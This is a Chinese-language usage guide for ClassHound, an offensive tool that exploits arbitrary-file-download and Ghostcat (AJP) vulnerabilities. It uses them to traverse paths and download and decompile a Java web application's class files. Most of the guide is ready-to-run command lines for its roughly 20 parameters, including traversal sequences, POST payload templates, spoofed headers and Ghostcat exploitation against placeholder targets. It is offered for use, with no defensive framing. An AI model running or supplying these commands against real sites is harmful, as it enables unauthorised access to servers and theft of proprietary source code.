
ClassHound参数配置完全手册-u/-k/-p等20参数使用技巧【免费下载链接】ClassHound利用任意文件下载漏洞循环下载反编译 Class 文件获得网站 Java 源代码项目地址: https://gitcode.com/gh_mirrors/cl/ClassHoundClassHound是一款利用任意文件下载漏洞循环下载反编译Class文件以获取网站Java源代码的专业工具。本文将详细介绍其20核心参数的配置方法与使用技巧帮助你快速掌握这款强大工具的使用。基础必选参数-u/--url目标URL设置功能指定完整的下载URL文件路径需用分隔符包围示例python classhound.py -u http://127.0.0.1/download.jsp?pathimages/#1.png#说明URL中的#1.png#是文件路径占位符实际使用时会被工具自动替换为遍历路径-k/--keyword404页面关键词功能设置用于识别404错误页面的关键词使用场景当目标服务器返回非标准404状态码时通过关键词精准判断文件是否存在示例python classhound.py -u http://target.com/file?path#FILE# -k 页面不存在-p/--postPOST数据配置功能指定POST请求数据文件路径需用分隔符包围示例python classhound.py -u http://target.com/upload -p fileupload#1.txt#submit1说明适用于通过POST方式提交文件下载请求的场景文件下载控制参数-f/--fileURL列表文件功能指定包含多个下载URL路径的列表文件搭配参数-a/--auto自动检测并调整遍历字符数示例python classhound.py -f url_list.txt -a文件格式每行一个URL模板如http://target.com/download?path#FILE#http://target.com/getfile?f#FILE#-s/--sleep-time请求间隔控制功能设置两次请求之间的等待时间秒适用场景避免请求过于频繁被目标服务器拦截示例python classhound.py -u http://target.com/file?path#FILE# -s 2建议值根据目标服务器响应情况设置1-5秒路径遍历参数-bp/--base-path基础路径设置功能设置/WEB-INF文件夹的前缀Web路径默认值为/高级用法当目标应用部署在非根目录时使用示例python classhound.py -u http://target.com/app/download?path#FILE# -bp /app/python classhound.py -bp opt/tomcat/webapps/ROOT/-tc/--travel-char遍历字符设置功能指定用于路径遍历的字符序列如../示例python classhound.py -u http://target.com/file?path#FILE# -tc ../说明默认会自动尝试常见路径遍历字符组合-cc/--char-count遍历字符数量功能设置路径遍历字符的重复次数搭配参数-mc/--max-count最大尝试次数示例python classhound.py -u http://target.com/file?path#FILE# -cc 5 -mc 10请求配置参数-dc/--delimiter-char分隔符设置功能指定包围文件路径的分隔符字符默认值为#适用场景当URL中已包含#字符时需修改示例python classhound.py -u http://target.com/file?path$1.txt$ -dc $-hh/--http-headerHTTP头配置功能添加自定义HTTP请求头格式使用逗号分隔多个头信息示例python classhound.py -u http://target.com/file?path#FILE# -hh Referer:http://target.com,User-Agent:Mozilla/5.0,admin:true-hp/--http-proxy代理设置功能配置HTTP/HTTPS代理示例python classhound.py -u http://target.com/file?path#FILE# -hp http://127.0.0.1:8080漏洞利用参数-vul/--vulnerability漏洞类型选择功能指定使用其他漏洞类型进行文件下载当前支持ghostcat幽灵猫漏洞示例python classhound.py -u http://target.com -vul ghostcat --ajp-port 8009--ajp-portAJP端口设置功能指定Ghostcat漏洞的AJP端口默认值为8009示例python classhound.py -vul ghostcat --ajp-port 8010实战配置示例基础URL遍历模式python classhound.py -u http://target.com/download?pathimages/#FILE# -k Not Found -s 1 -cc 6POST请求模式python classhound.py -u http://target.com/upload -p fileupload#FILE#submit1 -k 文件不存在 -dc #Ghostcat漏洞利用python classhound.py -u http://target.com -vul ghostcat --ajp-port 8009 -bp /WEB-INF/ -mc 10批量URL文件模式python classhound.py -f url_list.txt -a -s 2 -hh Referer:http://target.com参数优先级说明命令行直接指定的参数优先于配置文件-f/--file参数会覆盖-u/--url的设置--ajp-port仅在-vul ghostcat时生效-a/--auto会自动调整-cc/--char-count参数通过合理组合以上参数你可以灵活应对各种Java Web应用的文件下载场景。建议根据目标服务器的实际情况从基础参数开始逐步调整高级配置以达到最佳的源代码获取效果。【免费下载链接】ClassHound利用任意文件下载漏洞循环下载反编译 Class 文件获得网站 Java 源代码项目地址: https://gitcode.com/gh_mirrors/cl/ClassHound创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考